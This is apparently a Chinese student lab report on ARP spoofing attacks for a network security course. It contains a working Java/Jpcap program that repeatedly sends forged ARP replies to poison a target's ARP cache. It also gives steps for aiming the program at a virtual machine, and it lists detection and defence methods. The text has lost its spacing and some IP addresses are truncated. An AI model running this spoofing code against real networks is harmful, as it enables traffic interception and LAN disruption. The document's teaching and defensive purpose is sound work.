网络安全导论 实验4A ARP攻击实验

实验4AARP攻击实验一、实验目的掌握Winpcap和Jpcap软件包的使用方法。理解ARP双向欺骗的原理，编程实现arp攻击。二、实验准备1、ARP攻击ARP欺骗可以分为只欺骗受害主机、只欺骗网关和双向欺骗三类，其实现原理见本章第1节。除了欺骗攻击外，还有ARP应答畸形包攻击：正常的ARP报文至少是46个字节，但是如果我们自己精心构造一个只有30个字节长的ARP应答报文，由于目前的网络交换设备没有充分考虑到这种情况的出现，当网络上连续出现这种畸形报文达到一定数量的时候，交换机的MAC缓存表就无法正常刷新，其严重后果就是整个局域网瘫痪。2、防范双绑措施是在路由器和终端上都进行IP-MAC绑定的措施，它可以对ARP欺骗的两边，伪造网关和截获数据，都具有约束的作用。这是从ARP欺骗原理上进行的防范措施，VLAN和交换机端口绑定通过划分VLAN和交换机端口绑定，也是防范ARP攻击常用的防范方法。做法是细致地划分VLAN，减小广播域的范围，使ARP在小范围内起作用，而不至于发生大面积影响。一些交换机具有MAC地址学习的功能，学习完成后，再关闭这个功能，就可以把对应的MAC和端口进行绑定，避免了病毒利用ARP攻击篡改自身地址。安装Wincap和Jpcap（1）到/上下载Winpcap安装包及开发包；（2）到/jpcap/jpcap上下载Jpcap安装包，下载并记录jpcap.dll和jpcap.jar的文件位置；（特别注意：jpcap.dll和jpcap.jar版本要一致）（3）在Eclipse中配置开发环境配置Jpcap路径：把Jpcap文件夹下lib文件夹里的Jpcap.dll复制到"C:\ProgramFiles\Java\jdk1.5.0_16\jre\bin"文件夹里面，再把Jpcap文件夹下lib文件夹里的Jpcap.jar复制到"C:\ProgramFiles\Java\jdk1.5.0_16\jre\lib\ext"文件夹里面。三、实验内容1．在被攻击主机下，打开cmd.exe，输入ipconfig/all，查看并记录被攻击主机的IP和MAC地址。2．分析、调试并运行如下Java程序packageedu.zufe.bzsecurity;import.InetAddress;importjpcap.JpcapCaptor;importjpcap.JpcapSender;importjpcap.NetworkInterface;importjpcap.packet.ARPPacket;importjpcap.packet.EthernetPacket;publicclassARPAttackUtil{ staticbyte[]stomac(Strings){byte[]mac=newbyte[]{(byte)0x00,(byte)0x00,(byte)0x00,(byte)0x00,(byte)0x00,(byte)0x00};String[]s1=s.split("-");for(intx=0;x<s1.length;x++){mac[x]=(byte)((Integer.parseInt(s1[x],16))&0xff);}returnmac;}publicstaticvoidmain(String[]args)throwsException{inttime=2;//重发间隔时间InetAddressdesip=InetAddress.getByName("54");//被欺骗的目标IP地址byte[]desmac=stomac("4C-CC-6A-55-01-88");//被欺骗的目标目标MAC数组InetAddresssrcip=InetAddress.getByName("");//源IP地址byte[]srcmac=stomac("4C-CC-6A-55-01-7D");//假的MAC数组//枚举网卡并打开设备NetworkInterface[]devices=JpcapCaptor.getDeviceList();NetworkInterfacedevice=devices[1];JpcapSendersender=JpcapSender.openDevice(device);//设置ARP包ARPPacketarp=newARPPacket();arp.hardtype=ARPPacket.HARDTYPE_ETHER;totype=ARPPacket.PROTOTYPE_IP;arp.operation=ARPPacket.ARP_REPLY;arp.hlen=6;arp.plen=4;arp.sender_hardaddr=srcmac;arp.sender_protoaddr=srcip.getAddress();arp.target_hardaddr=desmac;arp.target_protoaddr=desip.getAddress();//设置DLC帧EthernetPacketether=newEthernetPacket();ether.frametype=EthernetPacket.ETHERTYPE_ARP;ether.src_mac=srcmac;ether.dst_mac=desmac;arp.datalink=ether;//发送ARP应答包while(true){System.out.println("sendingarp..");sender.sendPacket(arp);Thread.sleep(time*2000);}}}四、实验报告1．通过实验回答下列问题给出程序运行的截图，说明程序的执行流程。程序运行截图程序代码修改部分因为一开始不知道device选择哪个所以使用print命令打印了网卡这个是各网卡的description因为攻击虚拟机所以device网卡选择1或者2用wireshark抓包看一下1是vmnet1网卡2是vmnet8网卡目标主机ip地址与mac地址，在虚拟机中用ifconfig命令查看IP地址为29Mac地址为00-0C-29-20-7C-90打开主机控制面板，确认其为哪个网卡双击进入，更改适配器设置分别双击两个虚拟网卡看网络连接详细信息Vmnet1：Vmnet8：发现主机vmnet8的网络连接IP地址网段和虚拟机一样所以要应用该虚拟网卡，根据上面抓包情况于是选择device[2],并且上面蓝标的ip地址即为arp攻击的源ip地址修改的ip地址只要符合格式即可在虚拟机里arp-a看攻击前的mac地址运行程序，观察抓包情况，已经在发包攻击了Arp-d后，再重新arp-a看一下发现已经篡改完成给出被攻击主机MAC地址和篡改后的MAC地址。攻击前攻击后２．简答题（1）ARP攻击的检测方法有哪些？1.尝试使用"arp-a"命令查看本地ARP缓存表，查找重复MAC地址或错的网关地址2.尝试使用nbtscan.exe工具扫描分析网内IP地址与MAC地址。3.尝试使用“ping”命令测试本机与其他内网主机的延迟时间，延迟高则可疑4.尝试使用ARP防火墙拦截ARP攻击数据包，根据攻击拦截日志进行判断5.尝试使用“折半法”(每次切断一半主机的网络连接)分析判断病毒源主机物理位置。6.尝试登陆路由器，检查DHCP分配日志信息与ARP缓存表，再做P/MAC地址绑定。尝试登陆交换机，查看MAC地址表，查找可疑MAC对应物理端口号，确定主机位置或开启"端口镜像"技术使用其他PC做旁侧流量的分析判断。7.根据交换机数据传输状态指示灯闪烁频率，判断病毒源，频次高则可疑。8.检测路由器是否开启了ProxyARP造成网络中存在大量ARP广播风暴或ARP扫描类数据包，从而导致相关软件报告攻击。9.尝试使用"WireShark"、“科来网络分析系统“、“SnifferPro"等嗅探分析软件对网络数据进行抓包检测，查找发布大量Broadcast类数据包源主机及其他无请求响应类ARP数据包发送源，或根据ARP包头源MAC地址与二层以太网数据SA字段进行比较，查看其是否一致来判断是否遭受ARP病毒攻击。（2）如何防御ARP攻击？1.可以安装专门针对ARP攻击的防御设备或者防御软件，开启如ARP防火墙或者各种杀毒软件网络威胁保护一项中的“防御MAC地址欺骗”功能。2.MAC地址绑定，使网络中每一台计算机的IP地址与硬件地址一一对应，不可更改。3.建议使用静态ARP缓存，用手工方法更新缓存中的记录，使ARP欺骗无法